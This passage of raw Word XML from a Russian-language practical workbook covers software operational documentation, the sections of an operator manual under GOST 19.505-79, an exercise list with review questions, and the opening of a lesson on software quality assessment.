          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Документация операторов-пользователей при применении программного средства;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="850" w:hanging="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Документация обучения специалистов применению ПС.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Документация администрирования при эксплуатации информационной системы должна обеспечивать поддержку первичной инсталляции, штатного функционирования и восстановления программ и данных после сбоев и отказов. Управляющая деятельность администратора состоит в манипулировании управляемыми объектами и должна описываться, анализироваться и регламентироваться совокупностью требований и документов. Для этого необходима полная документация о компонентах информационной системы (компьютерах, сетевых устройствах), которые имеют свои особенности в управлении с помощью специальных программных компонентов, поддерживающих администрирование и управление системой. К основным функциям системы администрирования, документы для которых подлежат разработке и оцениванию, относятся:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- планирование использования памяти и производительности вычислительной системы в рабочем режиме применения ПС, оперативное управление и распределение ресурсов информационной системы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- инсталляция и генерация рабочих версий ПС для оперативных пользователей;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- управление и учет внешней среды при выполнении адаптации и реконфигурации конкретного ПС;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- выявление, регистрация и накопление данных о сбоях и дефектах функционирования программ и данных;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- управление средствами защиты информации и санкционированного доступа пользователей, анализ попыток взлома системы защиты, восстановление программ и информации баз данных при искажениях;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- сбор и обобщение статистики о качестве функционирования ПС в составе системы обработки информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Документация операторов-пользователей должна обеспечивать корректную и квалифицированную эксплуатацию комплекса программ во всем диапазоне его характеристик, предписанных требованиями заказчика и зафиксированных метриками в использовании. Объектами разработки и оценивания являются документы на процедуры и компоненты интерфейса с внешней средой и с пользователями, определяющие инициализацию соответствующих операций, их ход и результаты, а также комфортность их выполнения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Должно быть предусмотрено достаточное качество идентификации ошибочных действий и ситуаций, а также стандартизированной формы сообщений об ошибках пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Приобретение, поставка, разработка, функционирование и сопровождение программных средств в значительной степени зависит от квалификации специалистов. Поэтому эксплуатационной документацией обязательно должно поддерживаться эффективное обучение персонала с целью его подготовки к приобретению, поставке, применению и сопровождению программного средства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Процесс обучения специалистов, контроль и учет результатов обучения с оцениванием достигнутой ими квалификации должен гарантировать, что соответствующие категории обученного персонала готовы для выполнения запланированных действий и решения задач с определенным программным средством.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824CBE" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Результатом выполнения работы является пользовательская документация к разработанному ПП.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задания к практической части</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Руководство оператора должно состоять из следующих частей:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Титульной;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Информационной;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Основной.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Титульная часть оформляется согласно ГОСТ19.104-78 ЕСПД. Основные надписи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Информационная часть должна состоять из аннотации и содержания. В аннотации приводят сведения о назначении документа и краткое изложение основной части.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Содержание включает перечень записей о структурных элементах основной части документа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Основная часть руководства оператора должна содержать следующие разделы: (ГОСТ19.505-79 ЕСПД. Руководство оператора. Требования к содержанию и оформлению)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Назначение программы содержит сведения о назначении программы и информацию, достаточную для понимания функций программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Условия выполнения программы должны содержать минимальный и максимальный состав аппаратурных и программных средств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Выполнение программы представляет собой последовательность действий оператора, обеспечивающих загрузку, выполнение и завершение программы, возможные варианты команд, которыми оператор может управлять выполнением программы, а также ответы программы на эти команды.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Сообщения оператору содержат тексты сообщений, выдаваемых в ходе выполнения программы и соответствующие действия оператора, его действия в случае сбоя, повторного запуска программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Составить руководство оператора в соответствии с ГОСТ19.505-79 ЕСПД. Руководство оператора. Требования к содержанию и оформлению.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00036F96" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Скомпоновать Руководство оператора в виде брошюры, в выбранной вами программе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Требования к отч</w:t>
      </w:r>
      <w:r w:rsidR="00036F96" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ту</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отч</w:t>
      </w:r>
      <w:r w:rsidR="00036F96" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> должен содержать титульный лист, содержание и основную часть, оформленную в</w:t>
      </w:r>
      <w:r w:rsidR="00036F96" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>соответствии с ГОСТ19.505-79 ЕСПД. Руководство оператора. Требования к содержанию и</w:t>
      </w:r>
      <w:r w:rsidR="00036F96" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>оформлению.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Варианты для задания:</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3"/>
        <w:gridCol w:w="3828"/>
      </w:tblGrid>
      <w:tr w:rsidR="00036F96" w:rsidRPr="00617AC0" w:rsidTr="00036F96">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00036F96" w:rsidRPr="00617AC0" w:rsidRDefault="00036F96" w:rsidP="00036F96">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1) Архиватор</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00036F96" w:rsidRPr="00617AC0" w:rsidRDefault="00036F96" w:rsidP="00036F96">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2) Текстовый редактор</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00036F96" w:rsidRPr="00617AC0" w:rsidRDefault="00036F96" w:rsidP="00036F96">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3) Файловый менеджер</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00036F96" w:rsidRPr="00617AC0" w:rsidRDefault="00036F96" w:rsidP="00036F96">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4) Антивирусная программа</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00036F96" w:rsidRPr="00617AC0" w:rsidRDefault="00036F96" w:rsidP="00036F96">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5) Аудио проигрыватель</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3828" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00036F96" w:rsidRPr="00617AC0" w:rsidRDefault="00036F96" w:rsidP="00036F96">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>6) Графический редактор</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00036F96" w:rsidRPr="00617AC0" w:rsidRDefault="00036F96" w:rsidP="00036F96">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>7) Браузер</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00036F96" w:rsidRPr="00617AC0" w:rsidRDefault="00036F96" w:rsidP="00036F96">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8) Видео редактор</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00036F96" w:rsidRPr="00617AC0" w:rsidRDefault="00036F96" w:rsidP="00036F96">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>9) Почтовый клиент</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00036F96" w:rsidRPr="00617AC0" w:rsidRDefault="00036F96" w:rsidP="00036F96">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10) Программа записи дисков</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="_Toc26278743"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Контрольные вопросы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Какая документация называется эксплуатационной?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Что относится к эксплуатационной документации?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Что относится к основным функциям системы администрирования?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Что должна обеспечивать документация операторов-пользователей?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B080D" w:rsidRPr="00617AC0" w:rsidRDefault="005656CF" w:rsidP="005656CF">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № 24 </w:t>
      </w:r>
      <w:r w:rsidR="009B080D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оценка качества отраслевого программного обеспечения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
    </w:p>
    <w:p w:rsidR="009B080D" w:rsidRPr="00617AC0" w:rsidRDefault="009B080D" w:rsidP="00776B59">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">формирование навыков </w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>проводения оценки качества программного средства по различным показателям.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B080D" w:rsidRPr="00617AC0" w:rsidRDefault="009B080D" w:rsidP="009B080D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B080D" w:rsidRPr="00617AC0" w:rsidRDefault="009B080D" w:rsidP="009B080D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткое теоретическое обоснование:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00776B59" w:rsidRPr="00617AC0" w:rsidRDefault="00776B59" w:rsidP="00776B59">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Все программы по характеру использования и категориям пользователей можно разделить на два класса - </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">утилитарные программы </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
